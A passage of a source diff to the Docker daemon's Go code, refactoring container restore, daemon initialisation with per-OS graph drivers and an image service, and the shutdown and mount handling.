libcontainerd.Client + defaultIsolation containertypes.Isolation // Default isolation mode on Windows + clusterProvider cluster.Provider + cluster Cluster + genericResources []swarm.GenericResource + metricsPluginListener net.Listener + + machineMemory uint64 seccompProfile []byte seccompProfilePath string + + diskUsageRunning int32 + pruneRunning int32 + hosts map[string]bool // hosts stores the addresses the daemon is listening on + startupDone chan struct{} + + attachmentStore network.AttachmentStore + attachableNetworkLock *locker.Locker +} + +// StoreHosts stores the addresses the daemon is listening on +func (daemon *Daemon) StoreHosts(hosts []string) { + if daemon.hosts == nil { + daemon.hosts = make(map[string]bool) + } + for _, h := range hosts { + daemon.hosts[h] = true + } } // HasExperimental returns whether the experimental features of the daemon are enabled or not func (daemon *Daemon) HasExperimental() bool { - if daemon.configStore != nil && daemon.configStore.Experimental { - return true - } - return false + return daemon.configStore != nil && daemon.configStore.Experimental } func (daemon *Daemon) restore() error { - var ( - currentDriver = daemon.GraphDriverName() - containers = make(map[string]*container.Container) - ) + containers := make(map[string]*container.Container) logrus.Info("Loading containers: start.") @@ -138,16 +147,20 @@ func (daemon *Daemon) restore() error { logrus.Errorf("Failed to load container %v: %v", id, err) continue } - + if !system.IsOSSupported(container.OS) { + logrus.Errorf("Failed to load container %v: %s (%q)", id, system.ErrNotSupportedOperatingSystem, container.OS) + continue + } // Ignore the container if it does not support the current driver being used by the graph - if (container.Driver == "" && currentDriver == "aufs") || container.Driver == currentDriver { - rwlayer, err := daemon.layerStore.GetRWLayer(container.ID) + currentDriverForContainerOS := daemon.graphDrivers[container.OS] + if (container.Driver == 
"" && currentDriverForContainerOS == "aufs") || container.Driver == currentDriverForContainerOS { + rwlayer, err := daemon.imageService.GetLayerByID(container.ID, container.OS) if err != nil { logrus.Errorf("Failed to load container mount %v: %v", id, err) continue } container.RWLayer = rwlayer - logrus.Debugf("Loaded container %v", container.ID) + logrus.Debugf("Loaded container %v, isRunning: %v", container.ID, container.IsRunning()) containers[container.ID] = container } else { @@ -160,7 +173,7 @@ func (daemon *Daemon) restore() error { activeSandboxes := make(map[string]interface{}) for id, c := range containers { if err := daemon.registerName(c); err != nil { - logrus.Errorf("Failed to register container %s: %s", c.ID, err) + logrus.Errorf("Failed to register container name %s: %s", c.ID, err) delete(containers, id) continue } @@ -170,12 +183,6 @@ func (daemon *Daemon) restore() error { continue } - // verify that all volumes valid and have been migrated from the pre-1.7 layout - if err := daemon.verifyVolumesInfo(c); err != nil { - // don't skip the container due to error - logrus.Errorf("Failed to verify volumes for container '%s': %v", c.ID, err) - } - // The LogConfig.Type is empty if the container was created before docker 1.12 with default log driver. // We should rewrite it to use the daemon defaults. 
// Fixes https://github.com/docker/docker/issues/22536 @@ -187,22 +194,93 @@ func (daemon *Daemon) restore() error { } } - var migrateLegacyLinks bool // Not relevant on Windows - var wg sync.WaitGroup - var mapLock sync.Mutex + var ( + wg sync.WaitGroup + mapLock sync.Mutex + ) for _, c := range containers { wg.Add(1) go func(c *container.Container) { defer wg.Done() - if err := backportMountSpec(c); err != nil { - logrus.Error("Failed to migrate old mounts to use new spec format") + daemon.backportMountSpec(c) + if err := daemon.checkpointAndSave(c); err != nil { + logrus.WithError(err).WithField("container", c.ID).Error("error saving backported mountspec to disk") + } + + daemon.setStateCounter(c) + + logrus.WithFields(logrus.Fields{ + "container": c.ID, + "running": c.IsRunning(), + "paused": c.IsPaused(), + }).Debug("restoring container") + + var ( + err error + alive bool + ec uint32 + exitedAt time.Time + ) + + alive, _, err = daemon.containerd.Restore(context.Background(), c.ID, c.InitializeStdio) + if err != nil && !errdefs.IsNotFound(err) { + logrus.Errorf("Failed to restore container %s with containerd: %s", c.ID, err) + return + } + if !alive { + ec, exitedAt, err = daemon.containerd.DeleteTask(context.Background(), c.ID) + if err != nil && !errdefs.IsNotFound(err) { + logrus.WithError(err).Errorf("Failed to delete container %s from containerd", c.ID) + return + } + } else if !daemon.configStore.LiveRestoreEnabled { + if err := daemon.kill(c, c.StopSignal()); err != nil && !errdefs.IsNotFound(err) { + logrus.WithError(err).WithField("container", c.ID).Error("error shutting down container") + return + } } if c.IsRunning() || c.IsPaused() { c.RestartManager().Cancel() // manually start containers because some need to wait for swarm networking - if err := daemon.containerd.Restore(c.ID, c.InitializeStdio); err != nil { - logrus.Errorf("Failed to restore %s with containerd: %s", c.ID, err) - return + + if c.IsPaused() && alive { + s, err := 
daemon.containerd.Status(context.Background(), c.ID) + if err != nil { + logrus.WithError(err).WithField("container", c.ID). + Errorf("Failed to get container status") + } else { + logrus.WithField("container", c.ID).WithField("state", s). + Info("restored container paused") + switch s { + case libcontainerd.StatusPaused, libcontainerd.StatusPausing: + // nothing to do + case libcontainerd.StatusStopped: + alive = false + case libcontainerd.StatusUnknown: + logrus.WithField("container", c.ID). + Error("Unknown status for container during restore") + default: + // running + c.Lock() + c.Paused = false + daemon.setStateCounter(c) + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + logrus.WithError(err).WithField("container", c.ID). + Error("Failed to update stopped container state") + } + c.Unlock() + } + } + } + + if !alive { + c.Lock() + c.SetStopped(&container.ExitStatus{ExitCode: int(ec), ExitedAt: exitedAt}) + daemon.Cleanup(c) + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + logrus.Errorf("Failed to update stopped container %s state: %v", c.ID, err) + } + c.Unlock() } // we call Mount and then Unmount to get BaseFs of the container @@ -215,7 +293,6 @@ func (daemon *Daemon) restore() error { // The error is only logged here. logrus.Warnf("Failed to mount container on getting BaseFs path %v: %v", c.ID, err) } else { - // if mount success, then unmount it if err := daemon.Unmount(c); err != nil { logrus.Warnf("Failed to umount container on getting BaseFs path %v: %v", c.ID, err) } @@ -231,28 +308,27 @@ func (daemon *Daemon) restore() error { activeSandboxes[c.NetworkSettings.SandboxID] = options mapLock.Unlock() } - } - // fixme: only if not running + // get list of containers we need to restart - if !c.IsRunning() && !c.IsPaused() { - // Do not autostart containers which - // has endpoints in a swarm scope - // network yet since the cluster is - // not initialized yet. 
We will start - // it after the cluster is - // initialized. - if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint { - mapLock.Lock() - restartContainers[c] = make(chan struct{}) - mapLock.Unlock() - } else if c.HostConfig != nil && c.HostConfig.AutoRemove { - mapLock.Lock() - removeContainers[c.ID] = c - mapLock.Unlock() - } + + // Do not autostart containers which + // has endpoints in a swarm scope + // network yet since the cluster is + // not initialized yet. We will start + // it after the cluster is + // initialized. + if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint && c.HasBeenStartedBefore { + mapLock.Lock() + restartContainers[c] = make(chan struct{}) + mapLock.Unlock() + } else if c.HostConfig != nil && c.HostConfig.AutoRemove { + mapLock.Lock() + removeContainers[c.ID] = c + mapLock.Unlock() } + c.Lock() if c.RemovalInProgress { // We probably crashed in the middle of a removal, reset // the flag. @@ -263,15 +339,13 @@ func (daemon *Daemon) restore() error { // be removed. So we put the container in the "dead" // state and leave further processing up to them. 
logrus.Debugf("Resetting RemovalInProgress flag from %v", c.ID) - c.ResetRemovalInProgress() - c.SetDead() - c.ToDisk() - } - - // if c.hostConfig.Links is nil (not just empty), then it is using the old sqlite links and needs to be migrated - if c.HostConfig != nil && c.HostConfig.Links == nil { - migrateLegacyLinks = true + c.RemovalInProgress = false + c.Dead = true + if err := c.CheckpointTo(daemon.containersReplica); err != nil { + logrus.Errorf("Failed to update RemovalInProgress container %s state: %v", c.ID, err) + } } + c.Unlock() }(c) } wg.Wait() @@ -280,13 +354,6 @@ func (daemon *Daemon) restore() error { return fmt.Errorf("Error initializing network controller: %v", err) } - // Perform migration of legacy sqlite links (no-op on Windows) - if migrateLegacyLinks { - if err := daemon.sqliteMigration(containers); err != nil { - return err - } - } - // Now that all the containers are registered, register the links for _, c := range containers { if err := daemon.registerLinks(c, c.HostConfig); err != nil { @@ -348,7 +415,7 @@ func (daemon *Daemon) restore() error { // if the container has restart policy, do not // prepare the mountpoints since it has been done on restarting. // This is to speed up the daemon start when a restart container - // has a volume and the volume dirver is not available. + // has a volume and the volume driver is not available. if _, ok := restartContainers[c]; ok { continue } else if _, ok := removeContainers[c.ID]; ok { @@ -381,7 +448,7 @@ func (daemon *Daemon) RestartSwarmContainers() { // Autostart all the containers which has a // swarm endpoint now that the cluster is // initialized. 
- if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint { + if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint && c.HasBeenStartedBefore { group.Add(1) go func(c *container.Container) { defer group.Done() @@ -435,8 +502,8 @@ func (daemon *Daemon) parents(c *container.Container) map[string]*container.Cont func (daemon *Daemon) registerLink(parent, child *container.Container, alias string) error { fullName := path.Join(parent.Name, alias) - if err := daemon.nameIndex.Reserve(fullName, child.ID); err != nil { - if err == registrar.ErrNameReserved { + if err := daemon.containersReplica.ReserveName(fullName, child.ID); err != nil { + if err == container.ErrNameReserved { logrus.Warnf("error registering link for %s, to %s, as alias %s, ignoring: %v", parent.ID, child.ID, alias, err) return nil } @@ -457,15 +524,34 @@ func (daemon *Daemon) DaemonLeavesCluster() { // Daemon is in charge of removing the attachable networks with // connected containers when the node leaves the swarm daemon.clearAttachableNetworks() + // We no longer need the cluster provider, stop it now so that + // the network agent will stop listening to cluster events. daemon.setClusterProvider(nil) + // Wait for the networking cluster agent to stop + daemon.netController.AgentStopWait() + // Daemon is in charge of removing the ingress network when the + // node leaves the swarm. Wait for job to be done or timeout. + // This is called also on graceful daemon shutdown. We need to + // wait, because the ingress release has to happen before the + // network controller is stopped. 
+ if done, err := daemon.ReleaseIngress(); err == nil { + select { + case <-done: + case <-time.After(5 * time.Second): + logrus.Warnf("timeout while waiting for ingress network removal") + } + } else { + logrus.Warnf("failed to initiate ingress network removal: %v", err) + } + + daemon.attachmentStore.ClearAttachments() } // setClusterProvider sets a component for querying the current cluster state. func (daemon *Daemon) setClusterProvider(clusterProvider cluster.Provider) { daemon.clusterProvider = clusterProvider - // call this in a goroutine to allow netcontroller handle this event async - // and not block if it is in the middle of talking with cluster - go daemon.netController.SetClusterProvider(clusterProvider) + daemon.netController.SetClusterProvider(clusterProvider) + daemon.attachableNetworkLock = locker.New() } // IsSwarmCompatible verifies if the current daemon @@ -474,12 +560,12 @@ func (daemon *Daemon) IsSwarmCompatible() error { if daemon.configStore == nil { return nil } - return daemon.configStore.isSwarmCompatible() + return daemon.configStore.IsSwarmCompatible() } // NewDaemon sets up everything for the daemon to be able to service // requests from the webserver. -func NewDaemon(config *Config, registryService registry.Service, containerdRemote libcontainerd.Remote) (daemon *Daemon, err error) { +func NewDaemon(config *config.Config, registryService registry.Service, containerdRemote libcontainerd.Remote, pluginStore *plugin.Store) (daemon *Daemon, err error) { setDefaultMtu(config) // Ensure that we have a correct root key limit for launching containers. 
@@ -505,31 +591,41 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot return nil, err } - uidMaps, gidMaps, err := setupRemappedRoot(config) - if err != nil { - return nil, err - } - rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + idMappings, err := setupRemappedRoot(config) if err != nil { return nil, err } - + rootIDs := idMappings.RootPair() if err := setupDaemonProcess(config); err != nil { return nil, err } // set up the tmpDir to use a canonical path - tmp, err := tempDir(config.Root, rootUID, rootGID) + tmp, err := prepareTempDir(config.Root, rootIDs) if err != nil { return nil, fmt.Errorf("Unable to get the TempDir under %s: %s", config.Root, err) } - realTmp, err := fileutils.ReadSymlinkedDirectory(tmp) + realTmp, err := getRealPath(tmp) if err != nil { return nil, fmt.Errorf("Unable to get the full path to the TempDir (%s): %s", tmp, err) } - os.Setenv("TMPDIR", realTmp) + if runtime.GOOS == "windows" { + if _, err := os.Stat(realTmp); err != nil && os.IsNotExist(err) { + if err := system.MkdirAll(realTmp, 0700, ""); err != nil { + return nil, fmt.Errorf("Unable to create the TempDir (%s): %s", realTmp, err) + } + } + os.Setenv("TEMP", realTmp) + os.Setenv("TMP", realTmp) + } else { + os.Setenv("TMPDIR", realTmp) + } - d := &Daemon{configStore: config} + d := &Daemon{ + configStore: config, + PluginStore: pluginStore, + startupDone: make(chan struct{}), + } // Ensure the daemon is properly shutdown if there is a failure during // initialization defer func() { @@ -540,6 +636,17 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot } }() + if err := d.setGenericResources(config); err != nil { + return nil, err + } + // set up SIGUSR1 handler on Unix-like systems, or a Win32 global event + // on Windows to dump Go routine stacks + stackDumpDir := config.Root + if execRoot := config.GetExecRoot(); execRoot != "" { + stackDumpDir = execRoot + } + 
d.setupDumpStackTrap(stackDumpDir) + if err := d.setupSeccompProfile(); err != nil { return nil, err } @@ -549,8 +656,6 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot return nil, fmt.Errorf("error setting default isolation mode: %v", err) } - logrus.Debugf("Using default logging driver %s", config.LogConfig.Type) - if err := configureMaxThreads(config); err != nil { logrus.Warnf("Failed to configure golang's threads limit: %v", err) } @@ -560,111 +665,171 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot } daemonRepo := filepath.Join(config.Root, "containers") - if err := idtools.MkdirAllAs(daemonRepo, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAllAndChown(daemonRepo, 0700, rootIDs); err != nil { + return nil, err + } + + // Create the directory where we'll store the runtime scripts (i.e. in + // order to support runtimeArgs) + daemonRuntimes := filepath.Join(config.Root, "runtimes") + if err := system.MkdirAll(daemonRuntimes, 0700, ""); err != nil { + return nil, err + } + if err := d.loadRuntimes(); err != nil { return nil, err } if runtime.GOOS == "windows" { - if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0); err != nil && !os.IsExist(err) { + if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0, ""); err != nil { return nil, err } } - driverName := os.Getenv("DOCKER_DRIVER") - if driverName == "" { - driverName = config.GraphDriver + // On Windows we don't support the environment variable, or a user supplied graphdriver + // as Windows has no choice in terms of which graphdrivers to use. It's a case of + // running Windows containers on Windows - windowsfilter, running Linux containers on Windows, + // lcow. 
Unix platforms however run a single graphdriver for all containers, and it can + // be set through an environment variable, a daemon start parameter, or chosen through + // initialization of the layerstore through driver priority order for example. + d.graphDrivers = make(map[string]string) + layerStores := make(map[string]layer.Store) + if runtime.GOOS == "windows" { + d.graphDrivers[runtime.GOOS] = "windowsfilter" + if system.LCOWSupported() { + d.graphDrivers["linux"] = "lcow" + } + } else { + driverName := os.Getenv("DOCKER_DRIVER") + if driverName == "" { + driverName = config.GraphDriver + } else { + logrus.Infof("Setting the storage driver from the $DOCKER_DRIVER environment variable (%s)", driverName) + } + d.graphDrivers[runtime.GOOS] = driverName // May still be empty. Layerstore init determines instead. } d.RegistryService = registryService - d.PluginStore = plugin.NewStore(config.Root) // todo: remove + logger.RegisterPluginGetter(d.PluginStore) + + metricsSockPath, err := d.listenMetricsSock() + if err != nil { + return nil, err + } + registerMetricsPluginCallback(d.PluginStore, metricsSockPath) + + createPluginExec := func(m *plugin.Manager) (plugin.Executor, error) { + return pluginexec.New(getPluginExecRoot(config.Root), containerdRemote, m) + } + // Plugin system initialization should happen before restore. Do not change order. 
d.pluginManager, err = plugin.NewManager(plugin.ManagerConfig{ Root: filepath.Join(config.Root, "plugins"), - ExecRoot: "/run/docker/plugins", // possibly needs fixing + ExecRoot: getPluginExecRoot(config.Root), Store: d.PluginStore, - Executor: containerdRemote, + CreateExecutor: createPluginExec, RegistryService: registryService, LiveRestoreEnabled: config.LiveRestoreEnabled, LogPluginEvent: d.LogPluginEvent, // todo: make private + AuthzMiddleware: config.AuthzMiddleware, }) if err != nil { return nil, errors.Wrap(err, "couldn't create plugin manager") } - d.layerStore, err = layer.NewStoreFromOptions(layer.StoreOptions{ - StorePath: config.Root, - MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"), - GraphDriver: driverName, - GraphDriverOptions: config.GraphOptions, - UIDMaps: uidMaps, - GIDMaps: gidMaps, - PluginGetter: d.PluginStore, - ExperimentalEnabled: config.Experimental, - }) - if err != nil { + if err := d.setupDefaultLogConfig(); err != nil { return nil, err } - graphDriver := d.layerStore.DriverName() - imageRoot := filepath.Join(config.Root, "image", graphDriver) + for operatingSystem, gd := range d.graphDrivers { + layerStores[operatingSystem], err = layer.NewStoreFromOptions(layer.StoreOptions{ + Root: config.Root, + MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"), + GraphDriver: gd, + GraphDriverOptions: config.GraphOptions, + IDMappings: idMappings, + PluginGetter: d.PluginStore, + ExperimentalEnabled: config.Experimental, + OS: operatingSystem, + }) + if err != nil { + return nil, err + } + } - // Configure and validate the kernels security support - if err := configureKernelSecuritySupport(config, graphDriver); err != nil { - return nil, err + // As layerstore initialization may set the driver + for os := range d.graphDrivers { + d.graphDrivers[os] = layerStores[os].DriverName() } - logrus.Debugf("Max Concurrent Downloads: %d", *config.MaxConcurrentDownloads) - d.downloadManager = 
xfer.NewLayerDownloadManager(d.layerStore, *config.MaxConcurrentDownloads) - logrus.Debugf("Max Concurrent Uploads: %d", *config.MaxConcurrentUploads) - d.uploadManager = xfer.NewLayerUploadManager(*config.MaxConcurrentUploads) + // Configure and validate the kernels security support. Note this is a Linux/FreeBSD + // operation only, so it is safe to pass *just* the runtime OS graphdriver. + if err := configureKernelSecuritySupport(config, d.graphDrivers[runtime.GOOS]); err != nil { + return nil, err + } + imageRoot := filepath.Join(config.Root, "image", d.graphDrivers[runtime.GOOS]) ifs, err := image.NewFSStoreBackend(filepath.Join(imageRoot, "imagedb")) if err != nil { return nil, err } - d.imageStore, err = image.NewImageStore(ifs, d.layerStore) + lgrMap := make(map[string]image.LayerGetReleaser) + for os, ls := range layerStores { + lgrMap[os] = ls + } + imageStore, err := image.NewImageStore(ifs, lgrMap) if err != nil { return nil, err } - // Configure the volumes driver - volStore, err := d.configureVolumes(rootUID, rootGID) + d.volumes, err = volumesservice.NewVolumeService(config.Root, d.PluginStore, rootIDs, d) if err != nil { return nil, err } - trustKey, err := api.LoadOrCreateTrustKey(config.TrustKeyPath) + trustKey, err := loadOrCreateTrustKey(config.TrustKeyPath) if err != nil { return nil, err } trustDir := filepath.Join(config.Root, "trust") - if err := system.MkdirAll(trustDir, 0700); err != nil { + if err := system.MkdirAll(trustDir, 0700, ""); err != nil { return nil, err } - distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution")) + // We have a single tag/reference store for the daemon globally. However, it's + // stored under the graphdriver. On host platforms which only support a single + // container OS, but multiple selectable graphdrivers, this means depending on which + // graphdriver is chosen, the global reference store is under there. 
For + // platforms which support multiple container operating systems, this is slightly + // more problematic as where does the global ref store get located? Fortunately, + // for Windows, which is currently the only daemon supporting multiple container + // operating systems, the list of graphdrivers available isn't user configurable. + // For backwards compatibility, we just put it under the windowsfilter + // directory regardless. + refStoreLocation := filepath.Join(imageRoot, `repositories.json`) + rs, err := refstore.NewReferenceStore(refStoreLocation) if err != nil { - return nil, err + return nil, fmt.Errorf("Couldn't create reference store repository: %s", err) } - eventsService := events.New() - - referenceStore, err := reference.NewReferenceStore(filepath.Join(imageRoot, "repositories.json")) + distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution")) if err != nil { - return nil, fmt.Errorf("Couldn't create Tag store repositories: %s", err) + return nil, err } - migrationStart := time.Now() - if err := v1.Migrate(config.Root, graphDriver, d.layerStore, d.imageStore, referenceStore, distributionMetadataStore); err != nil { - logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. We recommend starting over with a clean storage directory if possible.", err) + // No content-addressability migration on Windows as it never supported pre-CA + if runtime.GOOS != "windows" { + migrationStart := time.Now() + if err := v1.Migrate(config.Root, d.graphDrivers[runtime.GOOS], layerStores[runtime.GOOS], imageStore, rs, distributionMetadataStore); err != nil { + logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. 
We recommend starting over with a clean storage directory if possible.", err) + } + logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds()) } - logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds()) // Discovery is only enabled when the daemon is launched with an address to advertise. When - // initialized, the daemon is registered and we can store the discovery backend as its read-only + // initialized, the daemon is registered and we can store the discovery backend as it's read-only if err := d.initDiscovery(config); err != nil { return nil, err } @@ -673,36 +838,46 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot // Check if Devices cgroup is mounted, it is hard requirement for container security, // on Linux. if runtime.GOOS == "linux" && !sysInfo.CgroupDevicesEnabled { - return nil, fmt.Errorf("Devices cgroup isn't mounted") + return nil, errors.New("Devices cgroup isn't mounted") } d.ID = trustKey.PublicKey().KeyID() d.repository = daemonRepo d.containers = container.NewMemoryStore() + if d.containersReplica, err = container.NewViewDB(); err != nil { + return nil, err + } d.execCommands = exec.NewStore() - d.referenceStore = referenceStore - d.distributionMetadataStore = distributionMetadataStore - d.trustKey = trustKey d.idIndex = truncindex.NewTruncIndex([]string{}) d.statsCollector = d.newStatsCollector(1 * time.Second) - d.defaultLogConfig = containertypes.LogConfig{ - Type: config.LogConfig.Type, - Config: config.LogConfig.Config, - } - d.EventsService = eventsService - d.volumes = volStore + + d.EventsService = events.New() d.root = config.Root - d.uidMaps = uidMaps - d.gidMaps = gidMaps + d.idMappings = idMappings d.seccompEnabled = sysInfo.Seccomp + d.apparmorEnabled = sysInfo.AppArmor - d.nameIndex = registrar.NewRegistrar() d.linkIndex = newLinkIndex() - d.containerdRemote = containerdRemote + + // 
TODO: imageStore, distributionMetadataStore, and ReferenceStore are only + // used above to run migration. They could be initialized in ImageService + // if migration is called from daemon/images. layerStore might move as well. + d.imageService = images.NewImageService(images.ImageServiceConfig{ + ContainerStore: d.containers, + DistributionMetadataStore: distributionMetadataStore, + EventsService: d.EventsService, + ImageStore: imageStore, + LayerStores: layerStores, + MaxConcurrentDownloads: *config.MaxConcurrentDownloads, + MaxConcurrentUploads: *config.MaxConcurrentUploads, + ReferenceStore: rs, + RegistryService: registryService, + TrustKey: trustKey, + }) go d.execCommandGC() - d.containerd, err = containerdRemote.Client(d) + d.containerd, err = containerdRemote.NewClient(ContainersNamespace, d) if err != nil { return nil, err } @@ -710,91 +885,90 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot if err := d.restore(); err != nil { return nil, err } + close(d.startupDone) // FIXME: this method never returns an error info, _ := d.SystemInfo() - engineVersion.WithValues( + engineInfo.WithValues( dockerversion.Version, dockerversion.GitCommit, info.Architecture, info.Driver, info.KernelVersion, info.OperatingSystem, + info.OSType, + info.ID, ).Set(1) engineCpus.Set(float64(info.NCPU)) engineMemory.Set(float64(info.MemTotal)) - // set up SIGUSR1 handler on Unix-like systems, or a Win32 global event - // on Windows to dump Go routine stacks - stackDumpDir := config.Root - if execRoot := config.GetExecRoot(); execRoot != "" { - stackDumpDir = execRoot + gd := "" + for os, driver := range d.graphDrivers { + if len(gd) > 0 { + gd += ", " + } + gd += driver + if len(d.graphDrivers) > 1 { + gd = fmt.Sprintf("%s (%s)", gd, os) + } } - d.setupDumpStackTrap(stackDumpDir) + logrus.WithFields(logrus.Fields{ + "version": dockerversion.Version, + "commit": dockerversion.GitCommit, + "graphdriver(s)": gd, + }).Info("Docker daemon") return d, 
nil } +// DistributionServices returns services controlling daemon storage +func (daemon *Daemon) DistributionServices() images.DistributionServices { + return daemon.imageService.DistributionServices() +} + +func (daemon *Daemon) waitForStartupDone() { + <-daemon.startupDone +} + func (daemon *Daemon) shutdownContainer(c *container.Container) error { stopTimeout := c.StopTimeout() - // TODO(windows): Handle docker restart with paused containers - if c.IsPaused() { - // To terminate a process in freezer cgroup, we should send - // SIGTERM to this process then unfreeze it, and the process will - // force to terminate immediately. - logrus.Debugf("Found container %s is paused, sending SIGTERM before unpausing it", c.ID) - sig, ok := signal.SignalMap["TERM"] - if !ok { - return fmt.Errorf("System does not support SIGTERM") - } - if err := daemon.kill(c, int(sig)); err != nil { - return fmt.Errorf("sending SIGTERM to container %s with error: %v", c.ID, err) - } - if err := daemon.containerUnpause(c); err != nil { - return fmt.Errorf("Failed to unpause container %s with error: %v", c.ID, err) - } - if _, err := c.WaitStop(time.Duration(stopTimeout) * time.Second); err != nil { - logrus.Debugf("container %s failed to exit in %d second of SIGTERM, sending SIGKILL to force", c.ID, stopTimeout) - sig, ok := signal.SignalMap["KILL"] - if !ok { - return fmt.Errorf("System does not support SIGKILL") - } - if err := daemon.kill(c, int(sig)); err != nil { - logrus.Errorf("Failed to SIGKILL container %s", c.ID) - } - c.WaitStop(-1 * time.Second) - return err - } - } + // If container failed to exit in stopTimeout seconds of SIGTERM, then using the force if err := daemon.containerStop(c, stopTimeout); err != nil { return fmt.Errorf("Failed to stop container %s with error: %v", c.ID, err) } - c.WaitStop(-1 * time.Second) + // Wait without timeout for the container to exit. + // Ignore the result. 
+ <-c.Wait(context.Background(), container.WaitConditionNotRunning) return nil } -// ShutdownTimeout returns the shutdown timeout based on the max stopTimeout of the containers, -// and is limited by daemon's ShutdownTimeout. +// ShutdownTimeout returns the timeout (in seconds) before containers are forcibly +// killed during shutdown. The default timeout can be configured both on the daemon +// and per container, and the longest timeout will be used. A grace-period of +// 5 seconds is added to the configured timeout. +// +// A negative (-1) timeout means "indefinitely", which means that containers +// are not forcibly killed, and the daemon shuts down after all containers exit. func (daemon *Daemon) ShutdownTimeout() int { - // By default we use daemon's ShutdownTimeout. shutdownTimeout := daemon.configStore.ShutdownTimeout + if shutdownTimeout < 0 { + return -1 + } + if daemon.containers == nil { + return shutdownTimeout + } graceTimeout := 5 - if daemon.containers != nil { - for _, c := range daemon.containers.List() { - if shutdownTimeout >= 0 { - stopTimeout := c.StopTimeout() - if stopTimeout < 0 { - shutdownTimeout = -1 - } else { - if stopTimeout+graceTimeout > shutdownTimeout { - shutdownTimeout = stopTimeout + graceTimeout - } - } - } + for _, c := range daemon.containers.List() { + stopTimeout := c.StopTimeout() + if stopTimeout < 0 { + return -1 + } + if stopTimeout+graceTimeout > shutdownTimeout { + shutdownTimeout = stopTimeout + graceTimeout } } return shutdownTimeout @@ -809,12 +983,15 @@ func (daemon *Daemon) Shutdown() error { if daemon.configStore.LiveRestoreEnabled && daemon.containers != nil { // check if there are any running containers, if none we should do some cleanup if ls, err := daemon.Containers(&types.ContainerListOptions{}); len(ls) != 0 || err != nil { + // metrics plugins still need some cleanup + daemon.cleanupMetricsPlugins() return nil } } if daemon.containers != nil { - logrus.Debugf("start clean shutdown of all containers with 
a %d seconds timeout...", daemon.configStore.ShutdownTimeout) + logrus.Debugf("daemon configured with a %d seconds minimum shutdown timeout", daemon.configStore.ShutdownTimeout) + logrus.Debugf("start clean shutdown of all containers with a %d seconds timeout...", daemon.ShutdownTimeout()) daemon.containers.ApplyAll(func(c *container.Container) { if !c.IsRunning() { return @@ -824,7 +1001,7 @@ func (daemon *Daemon) Shutdown() error { logrus.Errorf("Stop container error: %v", err) return } - if mountid, err := daemon.layerStore.GetMountID(c.ID); err == nil { + if mountid, err := daemon.imageService.GetLayerMountID(c.ID, c.OS); err == nil { daemon.cleanupMountsByID(mountid) } logrus.Debugf("container stopped %s", c.ID) @@ -837,12 +1014,18 @@ func (daemon *Daemon) Shutdown() error { } } - if daemon.layerStore != nil { - if err := daemon.layerStore.Cleanup(); err != nil { - logrus.Errorf("Error during layer Store.Cleanup(): %v", err) - } + if daemon.imageService != nil { + daemon.imageService.Cleanup() } + // If we are part of a cluster, clean up cluster's stuff + if daemon.clusterProvider != nil { + logrus.Debugf("start clean shutdown of cluster resources...") + daemon.DaemonLeavesCluster() + } + + daemon.cleanupMetricsPlugins() + // Shutdown plugins after containers and layerstore. Don't change the order. daemon.pluginShutdown() @@ -851,30 +1034,29 @@ func (daemon *Daemon) Shutdown() error { daemon.netController.Stop() } - if err := daemon.cleanupMounts(); err != nil { - return err - } - - return nil + return daemon.cleanupMounts() } // Mount sets container.BaseFS // (is it not set coming in? why is it unset?) 
func (daemon *Daemon) Mount(container *container.Container) error { + if container.RWLayer == nil { + return errors.New("RWLayer of container " + container.ID + " is unexpectedly nil") + } dir, err := container.RWLayer.Mount(container.GetMountLabel()) if err != nil { return err } logrus.Debugf("container mounted via layerStore: %v", dir) - if container.BaseFS != dir { + if container.BaseFS != nil && container.BaseFS.Path() != dir.Path() { // The mount path reported by the graph driver should always be trusted on Windows, since the // volume path for a given mounted layer may change over time. This should only be an error // on non-Windows operating systems. - if container.BaseFS != "" && runtime.GOOS != "windows" { + if runtime.GOOS != "windows" { daemon.Unmount(container) return fmt.Errorf("Error: driver %s is returning inconsistent paths for container %s ('%s' then '%s')", - daemon.GraphDriverName(), container.ID, container.BaseFS, dir) + daemon.imageService.GraphDriverForOS(container.OS), container.ID, container.BaseFS, dir) } } container.BaseFS = dir // TODO: combine these fields @@ -883,6 +1065,9 @@ func (daemon *Daemon) Mount(container *container.Container) error { // Unmount unsets the container base filesystem func (daemon *Daemon) Unmount(container *container.Container) error { + if container.RWLayer == nil { + return errors.New("RWLayer of container " + container.ID + " is unexpectedly nil") + } if err := container.RWLayer.Unmount(); err != nil { logrus.Errorf("Error unmounting container %s: %s", container.ID, err) return err @@ -891,96 +1076,73 @@ func (daemon *Daemon) Unmount(container *container.Container) error { return nil } -// V4Subnets returns the IPv4 subnets of networks that are managed by Docker. -func (daemon *Daemon) V4Subnets() []net.IPNet { - var subnets []net.IPNet +// Subnets return the IPv4 and IPv6 subnets of networks that are manager by Docker. 
